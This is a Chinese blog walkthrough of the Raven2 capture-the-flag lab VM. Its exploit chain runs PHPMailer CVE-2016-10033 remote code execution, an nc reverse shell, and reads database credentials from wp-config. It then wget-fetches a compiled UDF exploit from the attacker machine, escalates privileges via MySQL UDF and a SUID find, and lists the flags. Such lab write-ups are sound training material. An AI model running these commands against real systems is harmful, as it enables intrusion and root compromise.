美文网首页
Raven2渗透实战

Raven2渗透实战

作者: 城市烈人 | 来源:发表于2019-01-13 18:56 被阅读0次

在Raven1渗透实战中利用ssh的登录michael账号,查看wordpress的mysql数据库中的root账号、密码进行登录,再利用mysql udf提权。

或者通过wordpress.users表中的steven账号、密码进行ssh登录后,执行python提权。

但在Raven2渗透实战中发现wordpress泄露出来的账号 michael无法通过ssh登录,上述的方法自然就不可行了。

但在渗透过程中发现phpmalier远程代码执行漏洞(CVE-2016-10033)

phpmailer远程代码执行

http://192.168.8.126/vendor/PATH 发现第一个flag和网站根路径:/var/www/html/

flag1
flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}

http://192.168.8.126/vendor/VERSION 发现版本号 5.2.16

在kali中

searchsploit phpmailer
searchsploit

5.2.16版本正好在射程范围之内,选择40974.py,复制到根目录

cp /usr/share/exploitdb/exploits/php/webapps/40974.py /root/

更改配置信息,目标target,生成的后门文件名一定要改,shell反弹,后门路径
(注:targer地址应是站点的contact.php)

40974.py
运行该py程序,在靶机生成后门
python3 40974.py

(可能报错,pip安装所需要的模块即可)


python3 40974.py

在kali上开启nc监听,等待反弹,

nc -lvp 6666

触发后门:http://192.168.8.126/mm.php

反弹shell
用python切换到交互shell
python -c 'import pty;pty.spawn("/bin/bash")'
python shell
接下来直接先全局搜flag:
find flag
找到flag3,是图片,直接访问
http://192.168.8.126/wordpress/wp-content/uploads/2018/11/flag3.png
flag3
之后只要重复Raven1中的操作,查看wordpress中config配置,登录数据库
cat wp-config.php
wp-config
登录数据库 root / R@v3nSecurity
mysql –uroot –p

提权

进入wordpress数据库,查看users表

select * from wp_users
wp-users
michael    |  $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0   (解不出来)
steven     |  $P$B6X3H3ykawf2oHuPsbjQiih5iJXqad.
steven
steven / LOLLOL1
直接尝试ssh登录,竟然失败了,果然没Raven1这么简单

mysql udf提权

phpmailer反弹回来的shell是无法上传文件的,
只能通过wget从kali中下载exp (kali开启了apach服务)
先将exp 1518.c 在本地kali上编译完成后,靶机在wget

gcc -g -c 1518.c
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o –lc

靶机wget,编译后生成1518.so和1518.o,只需要1518.so即可

wget http://192.168.8.253/1518.so
wget

接下来提权过程就照着参考敲命令

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.01 sec)

mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.12 sec)

mysql> insert into foo values(load_file('/var/www/html/1518.so'));
Query OK, 1 row affected (0.12 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
Query OK, 1 row affected (0.03 sec)

mysql> create function do_system returns integer soname '1518.so';
Query OK, 0 rows affected (0.11 sec)

mysql> select * from mysql.func;
+-----------+-----+---------+----------+
| name      | ret | dl      | type     |
+-----------+-----+---------+----------+
| do_system |   2 | 1518.so | function |
+-----------+-----+---------+----------+
1 row in set (0.00 sec)

mysql> select do_system('chmod u+s /usr/bin/find');
+--------------------------------------+
| do_system('chmod u+s /usr/bin/find') |
+--------------------------------------+
|                                    0 |
+--------------------------------------+
1 row in set (0.01 sec)

mysql> quit
Bye

touch foo

find foo -exec 'whoami' \;

find foo -exec '/bin/sh' \;

Raven2

完成了Raven2渗透

Raven2靶机百度云
链接:https://pan.baidu.com/s/17vBNAeodW_tnBCMHFXK8QA
提取码:yusb

相关文章

  • Raven2渗透实战

    在Raven1渗透实战中利用ssh的登录michael账号,查看wordpress的mysql数据库中的root账...

  • 《Web渗透技术及实战案例解析.pdf》PDF高清完整版-免费下

    《Web渗透技术及实战案例解析.pdf》PDF高清完整版-免费下载 《Web渗透技术及实战案例解析.pdf》PDF...

  • 渗透实战:内网域渗透

    前言 本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使...

  • MERCY渗透实战

    信息收集 开放的端口服务有: smb枚举探测 139和445的共享服务端口,用enum4linux探测一下 发现q...

  • Sedna渗透实战

    靶机IP:192.168.8.153任务:获取4个flag分别在shell,root,还有靶机中 这个靶机开放了好...

  • RootThis渗透实战

    靶机ip:192.168.8.150 nmap扫端口 单单只开放了80 web服务端口 dir爆目录 小字典不够用...

  • eric渗透实战

    靶机IP :192.168.56.103 nmap扫 靶机比较简单,只开启了22和80端口 nmap探测到了192...

  • SolidState渗透实战

    靶机IP:192.168.218.147 nmap全端口扫 靶机开了一些不明端口 跑目录没发现什么 邮箱渗透 nm...

  • HackInOS渗透实战

    HackInOS渗透实战 该靶机很好玩,上马getshell,msf内网穿透,docker提权,简直帅炸了,无奈我...

  • WebDeveloper 渗透实战

    靶机IP:192.168.56.104 kali IP:192.168.56.101 nmap全扫 web渗透 既...

网友评论

      本文标题:Raven2渗透实战

      本文链接:https://www.haomeiwen.com/subject/xhsldqtx.html